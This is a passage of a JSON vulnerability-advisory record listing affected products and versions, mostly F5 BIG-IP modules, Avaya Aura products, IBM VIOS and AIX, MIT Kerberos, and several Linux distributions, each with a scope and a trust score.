"version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.12.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "big-ip link controller hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application server sip core pb23", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip gtm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.12" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "aura application server sip core pb28", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip link controller hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura application server sip core pb19", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "aura application server sip core pb26", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip gtm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core pb25", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": 